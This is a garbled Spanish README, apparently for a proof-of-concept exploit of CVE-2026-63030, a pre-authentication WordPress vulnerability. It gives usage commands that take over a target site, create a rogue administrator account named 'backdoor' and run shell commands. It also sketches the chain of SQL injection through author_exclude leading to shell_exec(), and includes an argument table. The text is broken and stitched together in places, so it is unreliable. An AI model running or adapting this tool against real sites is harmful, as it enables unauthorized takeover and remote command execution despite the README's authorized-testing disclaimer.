
Exploit de prueba de concepto para CVE-2026-63030, una vulnerabilidad de preautenticación en WordPress (versiones 6.9.0 hasta 7.0.1).
Prueba de concepto de explotación para CVE-2026-63030, una vulnerabilidad de preautenticación en WordPress (versiones 6.9.0 a 7.0.1). Encadena:
author_excludepython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude malicioso, aprovechando la confusión de rutas para ejecutar una consulta UNION.shell_exec().Esto es solo una prueba de concepto.
Está pensado para:
No lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito por escrito para probar. Los autores no asumen ninguna responsabilidad por el mal uso.
wp-config.php endurecido, la inyección SQL puede fallar.DISALLOW_FILE_MODS y DISALLOW_UNFILTERED_HTML en la configuración del objetivo.| Argumento | Descripción |
|---|
--url | URL raíz de WordPress objetivo (obligatorio) |
--username | Nombre de usuario administrador a crear (autogenerado si se omite) |
--password | Contraseña de administrador (autogenerada si se omite) |
--email | Correo electrónico del administrador (autogenerado si se omite) |
--command, -c | Comando a ejecutar mediante el plugin (por defecto: id) |
--post-id | Especifica un ID de entrada publicado (autodetectado si se omite) |
--timeout | Tiempo de espera HTTP en segundos (por defecto: 60) |